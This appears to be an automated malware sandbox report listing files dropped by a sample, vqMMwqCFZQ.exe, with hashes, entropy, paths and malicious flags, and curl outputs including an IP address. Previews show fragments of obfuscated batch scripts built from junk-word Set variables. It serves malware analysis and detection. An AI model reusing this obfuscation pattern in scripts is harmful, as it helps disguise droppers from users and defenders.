                                    SHA-256:B2381BFDDBBB5016607B0A66DF94ADC1B4552D6BB65682D492863C4E12A67E9B
                                    SHA-512:8C80DEF9F4B0C7F37AED52E7C2BC7602DC354CFEFB0CA3E33704B07BECB1AD3FE4828BF2F5C82AD000161DBC052E584105F305D67C1DF5079D6E95B79E4F768F
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6763
                                    Entropy (8bit):6.181007381204778
                                    Encrypted:false
                                    SSDEEP:192:9LHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jM5:9LHAHhww+/2nlP3r1WK
                                    MD5:7EDEB773E5981A722C32E62A44B557AA
                                    SHA1:8F215AEB386FA05B62509AF79FF886430913DE9A
                                    SHA-256:E36F5C7223E21AA3F6B2D2C3EE1C236BD7A568ED8804A3FE908D37A065A52BD3
                                    SHA-512:3C0DDA7920B3468FA1D7405A9A6E84C17940E91C1A93E0726F5DDF3C1F8FCC3B0706F517CE2CE7755942687FADBB28F506DA7C7BFBD9E742C2C9A06F8F47F804
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):924590
                                    Entropy (8bit):6.626218475261086
                                    Encrypted:false
                                    SSDEEP:24576:9Js7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:9C7hGOSPT/PxebaiO
                                    MD5:5E0A36A6A1E6CEB0BD42ED9DEBDE8666
                                    SHA1:6F0E0881B517206EAEF33364CA40B006038B5FE2
                                    SHA-256:1FBE941B779B8EE4152E224FE6856364B5B67BB7ECEF9F81EDE5DD7441165A3B
                                    SHA-512:7946F6A25406A15D83BD6BE6D0FA542A9D0B6C01515362FE8E318D5FCE5FC792C08AA163042DEAF2DE88EA79431175FB14C503288C12DAF6A971A9A8DDC9C80D
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82944
                                    Entropy (8bit):7.99782535181456
                                    Encrypted:true
                                    SSDEEP:1536:uUvnsq3c06LY1+ON5BCB3RcoDlnODJEE2VmktaqwktgrvT+zNkAX8HLAqe8BQ:/40q+DdsSknNLVFdpyrvTUkq8rNG
                                    MD5:46314326121D86FFC7D31F86B127EA68
                                    SHA1:A1B102103D81403B08E3F5D2B08C6F4B61761F4C
                                    SHA-256:F88402A04478329C5A7626ACDAA5B247EF7B6352C9D3C0F8C3BC806892797098
                                    SHA-512:96C4889BEC20D3B98096CE6DF50A53EE9B3C6AEB258495DE21B6F32BD96CB227082062CF4CFFA3587A05743423205F85E472C60A6F640E388FD829AD4E3E6D5D
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):7.9964112257752635
                                    Encrypted:true
                                    SSDEEP:768:BWVzlyOAYnoKD3B2049QknUNLB5f3Bc1nlHjbng01S/plADTTaQm695eVUjX:cAYnjDxTlc1lHnMDADTTagGs
                                    MD5:7C7B509C91FD9DA8DDFA9C3B5991C9EB
                                    SHA1:61FB5CF74F58BDE99C00A010E1A670BEB85FD8AD
                                    SHA-256:C6E57103AF0A2B2ACA227A2B8683B6298711454A84EF57DC91FD35D279DE9D64
                                    SHA-512:E56D32471A3C0B409A1B5A35065DB89ACE5F01928E915AB49A21242F74010C099F91F55272714F5F24C06824E5BBD0C4349DE5BFDC6E385030DEFE0D726CD06A
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):99328
                                    Entropy (8bit):7.998320064959559
                                    Encrypted:true
                                    SSDEEP:3072:tSSpU6SiAA4NS4Hn/MnR6fwz3zyXAPzwTMi5MNLX/:tfhAJHnEnRdz3zyXAUMNNLv
                                    MD5:3DF0D5DE7053FB2549302A0179A1BF61
                                    SHA1:FF703D20952AF8746DFB6BEE91A4D1087FD00178
                                    SHA-256:44AD7D019A43BBF79153340DA5E71F688E3C03D3E5D46182E43700F5A4DD7969
                                    SHA-512:BF8FEDD43BA4C6C7E1FE3384140C48CBFEBB94D4C8C4FDC9684CB5AEAD0753372031F1BDCCCF01080EFA8C3DC549E6C273BF07F263496558414DB4432DFB639F
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):90112
                                    Entropy (8bit):7.998043435850004
                                    Encrypted:true
                                    SSDEEP:1536:BkspQryWj2DB86kbeQQ5DD955kxqAkyX/q3gwCupc3/xILWmIeFTjlApoGpWPO:SpyWc2TC/9D9fkxqAky/qwJ3jWJq5T
                                    MD5:70F463CB11CAF1C1982FD2699516C417
                                    SHA1:09DCCD4A57687724766E9F989F5965CA46B3EA2F
                                    SHA-256:18EE6AF15A8D07472934ED7B98773BAAEEDAF0A9F3D36B4D5392DC3D1D41F52B
                                    SHA-512:948D29CF7EC91B5A571E273801035310B9E289DEA2A87CB83571A73A2E2C0207171FBF6CE7CECB4639F229EABB98290C10E16EF08DD2E795E3A5B6C56C638371
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):886872
                                    Entropy (8bit):6.622149769980728
                                    Encrypted:false
                                    SSDEEP:12288:iV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:gxz1JMyyzlohMf1tN70aw8501
                                    MD5:8830E269348EC39F4E379A7FAFFAB6BB
                                    SHA1:2382443521713A512B44178BB720DE79002FD759
                                    SHA-256:6137C618795F4FF75828534F776CC2F979126CF58DDFC8E4BD8D0C57E99365A8
                                    SHA-512:C1844C8ABB43D5991BBE56E026FE493D1D8AECB3559ECCF0E8D0CED51A0A6242EB1D611A744BED5592BA0EA6C6690D073BF7ADFD79B47252DF5ECFC9502137D9
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):83968
                                    Entropy (8bit):7.99777953585341
                                    Encrypted:true
                                    SSDEEP:1536:0hrgsLjJ2daNKUtnGZUs1bMOLBCSzfMA0x6S3gWlETHnJHL:0x3LjFKUtnyUsVFBFzD0xXgWSJHL
                                    MD5:AC10591ABC6E8218601573329D394545
                                    SHA1:7AD13438209AB213DABCC5274425A75C8BB63B27
                                    SHA-256:E720BCD9B3FB4CD02E1F7C16CCDBF9017E1231F390976C9BC6592E3E878F630A
                                    SHA-512:34FC9287C42FE1626DD1150E49D172166C4B9E47287BB2D56994AC5B1F237E938CB332F3E0B0C94408E2473AAF6B29F8E7731DE9FBD9D636320FB7238A6B2A4D
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82944
                                    Entropy (8bit):7.997454439778383
                                    Encrypted:true
                                    SSDEEP:1536:pNkbqY2FDb8R4MjFZwtLh5H5oeuPyXFvaqRhBT5z3QqVl/8W4zsZeQJ:pNk32FDgXEhZ5VzViwJ5zAqz/8WNcQJ
                                    MD5:D1DA7B87F186D2F06637FDB6851E4043
                                    SHA1:D84CD866C1F50D57FCA2A0000C9E5231229866D1
                                    SHA-256:B91FF890AF60C6AAD4BB50FB9ED5A8593A8ED0FF26568732A130BB4DA22BAF09
                                    SHA-512:697608D39B19C2B9A617102A74377A438BF1D53430DC09A225D98D59AB3A65B807E12F84D464F335190047624CDDB1452088B89FED15BB667C875FEAA8BED1F8
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):26264
                                    Entropy (8bit):7.993020302135022
                                    Encrypted:true
                                    SSDEEP:768:v4ZuBgKUFIkJMQv0qUlx5r/pgkmbrpPHTTpMe+QiA:vouaKUFIBbqUn5berpPXpLd9
                                    MD5:DFE7ED86807FA94FAF01EEC261B0C875
                                    SHA1:BBD3A51945EA88C8FD4D70DD60B21A3258E5BE60
                                    SHA-256:C3D736E2745309C252E0A773A65F05B4AA9564C3246473888DF44126BD8A35D0
                                    SHA-512:01592287910E99128F329EBE309E1189EDEDEF61E5ADE26321C9177937BA7C8B8CDD033D868ED7E45435C1B761ABC250A19626967ED6007F275A421E7D7CFB39
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1151988
                                    Entropy (8bit):7.977544256260055
                                    Encrypted:false
                                    SSDEEP:24576:jk8k+VnD9c/rJH6DguRRE0SBpQKkRS78imlEQ6dDyzKdKXnJX8cmegcEipn/:lkMnEa5dnZS78iokGRnJV7n/
                                    MD5:B487B5B51436B42576D60A1FE58F8399
                                    SHA1:4FF23FB37AABA96AC114FC54B397A902E4D9D650
                                    SHA-256:440FCA4D671E78345ED1763F7904174EFFDA3ECD567D7E20224E5910028B83C0
                                    SHA-512:DE6974616095ECDE0A222099D74FD08B307EB1213105053C14638A96FCB526C68FA53645D0B9359E1293B42AF45B01226AF7A373AC3A64709632C5D093C19EE5
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 58%
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):88064
                                    Entropy (8bit):7.9980376794357575
                                    Encrypted:true
                                    SSDEEP:1536:Ad6ROLk6LJBOGir/67SrmGIQvugEx1Aa2RQkHTnwBPFe0nZevuy461Pln:+evWOGir/MSrIQvtra2J6PFe0ZB6Xn
                                    MD5:BACA9A04DD19F20199C21C2EBF0374AA
                                    SHA1:5DF76C54FD5F02DB7DF46FB38EF41449430545D0
                                    SHA-256:4325FAC47DF15F794B41742445329E5028C09B85F56696B1B590B0E8C5FDEC09
                                    SHA-512:39B10B8A6D9D55CACC30F8424E468F133EB599A29F1BE3CE20563DDDE0192FCDFAE891BEEE9F64FEF074A2D4113EEA7F14BDBBCD662398F36CD8B5CB037C5973
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:ASCII text, with very long lines (1312), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):27864
                                    Entropy (8bit):5.097783792840429
                                    Encrypted:false
                                    SSDEEP:768:GyoGt7cUtqnmJJbg0LJr+H6yqd1iODluLc2hAXQS1e4:zZtkmJJk+Jr+md8OBuLzGQge4
                                    MD5:EA06D1BF2AC0ECE898D348D4D0559255
                                    SHA1:FC121D4832E0DCEBED63E6AF20D88B3D6406314C
                                    SHA-256:1EC9CC6B926282A80E3938D9A3DD0944CF79D1F3513B489B64FFDF1121E3595F
                                    SHA-512:9F65B3D381C992446E11749F498F3E37979B050A787D176F46B8158008F7CBDE83C185133EE2F6DEDA8DEC6A6C45548D6D91B419FFC4FA3DBF1A6D7D6233C3E4
                                    Malicious:false
                                    Preview:Set Niger=g..MoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-..lMAAlien-..UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-..bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-..lNCompleted-..KRuxInjection-Med-..HeTft-Crazy-Shares-..hyCGifts-Rats-Shakira-Principle-Community-Gates-..PNbUntil-Tones-Illustrated-Varying-Senator-Considers-Floors-..uCUValuable-..Set Warcraft=h..nrcnAssociated-Tile-Almost-Edited-Edt-Victoria-Load-..bRUWma-Spreading-Worry-Calculate-..yxIParameter-Wondering-Syria-Toolbox-Acer-Tricks-Printable-..mDwGJuvenile-Usually-Packet-Kruger-Toronto-Shock-..jgRepublicans-Du-..Set Toe=u..aKaRTractor-Missed-Important-Declined-Eyes-..QjfmExplaining-Salary-Naked-..oKAttached-Genesis-Dude-Proceed-Johnston-Script-Libraries-..XUPlatinum-..WzTattoo-Credit-Funny-Sharp-Sally-..fhPPortal-Boot-Moore-Ourselves-..QHqInform-Creatures-Crash-..HLRaise-Tobacco-Colorado-..ldXPsp-Briefs-Seeking-..VJtwCanvas-Brake-Harper-Jake-Excluded-Dinner-Defence-All-Earl-..
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with very long lines (1312), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):27864
                                    Entropy (8bit):5.097783792840429
                                    Encrypted:false
                                    SSDEEP:768:GyoGt7cUtqnmJJbg0LJr+H6yqd1iODluLc2hAXQS1e4:zZtkmJJk+Jr+md8OBuLzGQge4
                                    MD5:EA06D1BF2AC0ECE898D348D4D0559255
                                    SHA1:FC121D4832E0DCEBED63E6AF20D88B3D6406314C
                                    SHA-256:1EC9CC6B926282A80E3938D9A3DD0944CF79D1F3513B489B64FFDF1121E3595F
                                    SHA-512:9F65B3D381C992446E11749F498F3E37979B050A787D176F46B8158008F7CBDE83C185133EE2F6DEDA8DEC6A6C45548D6D91B419FFC4FA3DBF1A6D7D6233C3E4
                                    Malicious:false
                                    Preview:Set Niger=g..MoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-..lMAAlien-..UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-..bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-..lNCompleted-..KRuxInjection-Med-..HeTft-Crazy-Shares-..hyCGifts-Rats-Shakira-Principle-Community-Gates-..PNbUntil-Tones-Illustrated-Varying-Senator-Considers-Floors-..uCUValuable-..Set Warcraft=h..nrcnAssociated-Tile-Almost-Edited-Edt-Victoria-Load-..bRUWma-Spreading-Worry-Calculate-..yxIParameter-Wondering-Syria-Toolbox-Acer-Tricks-Printable-..mDwGJuvenile-Usually-Packet-Kruger-Toronto-Shock-..jgRepublicans-Du-..Set Toe=u..aKaRTractor-Missed-Important-Declined-Eyes-..QjfmExplaining-Salary-Naked-..oKAttached-Genesis-Dude-Proceed-Johnston-Script-Libraries-..XUPlatinum-..WzTattoo-Credit-Funny-Sharp-Sally-..fhPPortal-Boot-Moore-Ourselves-..QHqInform-Creatures-Crash-..HLRaise-Tobacco-Colorado-..ldXPsp-Briefs-Seeking-..VJtwCanvas-Brake-Harper-Jake-Excluded-Dinner-Defence-All-Earl-..
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):55296
                                    Entropy (8bit):7.996425515192741
                                    Encrypted:true
                                    SSDEEP:1536:QjlyE+ynuF+X9HagYe9pCzlN0QHVIOpsgEFqNqRBa:QjlR+J+NS/zlq2Ies/FqNqm
                                    MD5:6F514C002DA512210E64BB40B389938E
                                    SHA1:2E18FF508F42EFA8B771DE5C6C4AB776B95F27E5
                                    SHA-256:F3612359DC4FCF6B5B1A1F7DE8D01260B029FA5663DECD830EA701F49D8F9254
                                    SHA-512:32B0420FB84921812B864367776FD8F8EBFA00799CB474673CDA445448F7D60BBB43C2464622256B8CE5B45D58620E15C524B379914254C6A366896E5A9FE96E
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):93184
                                    Entropy (8bit):7.998179873024088
                                    Encrypted:true
                                    SSDEEP:1536:IJ7fpWmVR947WJpKBjqGlfMyWw4XNetIVwnkjN5VfmzPKR:IJdWGiWJpg0SGEkRR
                                    MD5:3AE881AAE44C0D99645ECCD7C0476DE2
                                    SHA1:D888F63971C106EA70C94742259E4B012352C189
                                    SHA-256:53AD1ED80D9A1C61242F88DA71CE874E3F23DBA723A8BCD311A9C5611D9E6824
                                    SHA-512:46F11524A3BF7A9DF6E020C349C241CB23E33250CA05E8047D4D9555DBDFA9E008673961298E645B5B1A64635FEF9F8C2DD938B5E4496305013D1436CDF32659
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):17183
                                    Entropy (8bit):7.988350562180771
                                    Encrypted:false
                                    SSDEEP:384:wA4VpjZ/UNGuIvgvnYQNJeCmEDnOwdDJKAQWX0emQYg5vh6p:wA4VpyNGHvgvnxeCvOWPQATYgOp
                                    MD5:C93AF8F0303E164AED3CC9322F159DAA
                                    SHA1:D187A11D000A1CF0FA59EFB54F4FFC231F7BEF06
                                    SHA-256:63D5678C4E49212E030896980B1AE1088198FDB582BEDBF4518F2B4B650A5F0B
                                    SHA-512:5F8388C1AAA4A06AE1CEAFC10E0E2C53FC62A41D2EACE3AFCB59F102440274395B7A6464CF739FCD8AE164145D3143F726C3D76B09A2A0EF3B30FAB7014885A8
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:ASCII text, with very long lines (689), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):17649
                                    Entropy (8bit):5.128627831486869
                                    Encrypted:false
                                    SSDEEP:384:oRQvh6Ic90ko3C/plQUaeEHtPTfufYpKXA5x/5G8KAAYXJ1VifnwvGr:2R9pnll/EN845LXVifz
                                    MD5:F22350550734A9DBCC5059A9F385A695
                                    SHA1:055DA36D423DE6FAA27AC37D557F495B0691BFFE
                                    SHA-256:D72E5BD3169F5557AFBC7976C82B4F1BD2793147525FEE1C986DA99C6503DA02
                                    SHA-512:28657A31464AB3AA20B5345A9D02B57865A49248A206210F7171FE3DB423BFBFE2BADA2C41BBD141C4EEA08FF61A6585697D2ABB97C63D5FA2802AA03852E3D9
                                    Malicious:false
                                    Preview:Set Efforts=W..PZuTerrain-Atom-Accessories-..egConsistent-Firewall-Worldcat-Media-Vic-River-Characterized-..aXOAWishes-Modify-Km-..xUmmAberdeen-..xfWStriking-Ferrari-Static-Naked-Giving-..zDCisco-Exception-Association-Cowboy-..hGqSku-Expect-Evaluation-Misc-Chart-..iPkoMary-China-Pee-Sophisticated-..Set Love=s..RBtSWb-..JyNPPromotional-Expert-Universal-..zMcNervous-Geek-..iwpqLot-Polyphonic-Airline-Calm-Cigarette-..fpKpEars-Movies-..MPRConservation-Forever-Horrible-..runBlues-Ins-Montana-Upload-..RYzoRelax-Places-Atlas-Resolved-..Set Staying=r..SsmJBusy-Rental-Episodes-Programmer-Leader-Capitol-..vXPassword-Enabling-Profession-Casinos-Provides-Belt-Pond-Hungarian-Surround-..NPWProvidence-Grill-See-..lPTMNylon-Disclaimer-Service-Flavor-Cuisine-Nutrition-..weeERegulated-Hq-Filling-Serious-Plays-Collection-..GiPdZoophilia-Xp-Boxed-Feel-Healthcare-Democratic-Childhood-Anatomy-..JtTVInns-Slides-Throughout-Lauren-Punch-Rentcom-Fill-..YYbWOl-Welcome-Britain-Jet-She-..Set Egyptian=0..pqePDimens
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with very long lines (689), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):17649
                                    Entropy (8bit):5.128627831486869
                                    Encrypted:false
                                    SSDEEP:384:oRQvh6Ic90ko3C/plQUaeEHtPTfufYpKXA5x/5G8KAAYXJ1VifnwvGr:2R9pnll/EN845LXVifz
                                    MD5:F22350550734A9DBCC5059A9F385A695
                                    SHA1:055DA36D423DE6FAA27AC37D557F495B0691BFFE
                                    SHA-256:D72E5BD3169F5557AFBC7976C82B4F1BD2793147525FEE1C986DA99C6503DA02
                                    SHA-512:28657A31464AB3AA20B5345A9D02B57865A49248A206210F7171FE3DB423BFBFE2BADA2C41BBD141C4EEA08FF61A6585697D2ABB97C63D5FA2802AA03852E3D9
                                    Malicious:false
                                    Preview:Set Efforts=W..PZuTerrain-Atom-Accessories-..egConsistent-Firewall-Worldcat-Media-Vic-River-Characterized-..aXOAWishes-Modify-Km-..xUmmAberdeen-..xfWStriking-Ferrari-Static-Naked-Giving-..zDCisco-Exception-Association-Cowboy-..hGqSku-Expect-Evaluation-Misc-Chart-..iPkoMary-China-Pee-Sophisticated-..Set Love=s..RBtSWb-..JyNPPromotional-Expert-Universal-..zMcNervous-Geek-..iwpqLot-Polyphonic-Airline-Calm-Cigarette-..fpKpEars-Movies-..MPRConservation-Forever-Horrible-..runBlues-Ins-Montana-Upload-..RYzoRelax-Places-Atlas-Resolved-..Set Staying=r..SsmJBusy-Rental-Episodes-Programmer-Leader-Capitol-..vXPassword-Enabling-Profession-Casinos-Provides-Belt-Pond-Hungarian-Surround-..NPWProvidence-Grill-See-..lPTMNylon-Disclaimer-Service-Flavor-Cuisine-Nutrition-..weeERegulated-Hq-Filling-Serious-Plays-Collection-..GiPdZoophilia-Xp-Boxed-Feel-Healthcare-Democratic-Childhood-Anatomy-..JtTVInns-Slides-Throughout-Lauren-Punch-Rentcom-Fill-..YYbWOl-Welcome-Britain-Jet-She-..Set Egyptian=0..pqePDimens
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):19214
                                    Entropy (8bit):6.415320460009485
                                    Encrypted:false
                                    SSDEEP:384:AlFuOqohnWzR7NNilkEdpMMKAdbLPlUccucHU0f//+ddNEqCt7E3c:8FxfhnWz8kETRZbRUccWk+3+e3c
                                    MD5:26E155FC3EF2C17CD9E020224971D6B6
                                    SHA1:B39303949CB9DF0E79E7D379492EF985F9803BCD
                                    SHA-256:A587A7035E7BA1E0A687D365C7239724C2AF5616826EE7CBE6B42C03AC89448B
                                    SHA-512:E7E19FF87E894D3EB0DEB2A39C78E6C158350DD4E641A1BA7127EBC6120AED680EE86BFA06C448B6B640D3065AC5A5A4E7AE0EC7E7D97927C5256BA549230FD9
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:modified
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):1813320
                                    Entropy (8bit):5.7074044081208415
                                    Encrypted:false
                                    SSDEEP:24576:WZZeX7tl1xw6JW3VrIS9GswjQGmToAnPDRPyccc9ntn5fS/Z76hMAX:ueDf0G875qqtnvWg
                                    MD5:2EAAE68CA44390605379C1973A83C343
                                    SHA1:4CE10B0C2717A631A53ACA5E9DAA7B0BF823C2E6
                                    SHA-256:1C8097E10CD7B6189A5E13E3B730E5E859675604EB8C459D7F7314D434CB9D8D
                                    SHA-512:CF365B466C2D8073B9DF3495428A8E0183BEC2D623372D4CFDFE58144E91B972C725B2C3430BC0D904D7CDD5E21C13F32AF9B2148E6ED5DA2EE9FF25994EA929
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):11
                                    Entropy (8bit):3.0271691184406193
                                    Encrypted:false
                                    SSDEEP:3:fuMjn:2c
                                    MD5:25E067CD4E4A75F63362CC5BBB6753F7
                                    SHA1:B44F0BDC9FF51735FFC74806DF56F87C47F232D8
                                    SHA-256:79372B9479FE4256464762527DE1169F3C449582EC7625C2D7A1F6FB7D4B62F9
                                    SHA-512:F863DD82AA3DC83387866153D3862F96DAD0F8F3A60D0ACC9F076EC20BD659671802FAD9B2E6B3E11E82C548C88040CB58682CD8566EE149B228E89A5850B4EB
                                    Malicious:false
                                    Preview:8.46.123.75
                                    Process:C:\Windows\SysWOW64\curl.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):4
                                    Entropy (8bit):2.0
                                    Encrypted:false
                                    SSDEEP:3:On:On
                                    MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                    SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                    SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                    SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                    Malicious:false
                                    Preview:bhlo
                                    Process:C:\Windows\SysWOW64\curl.exe
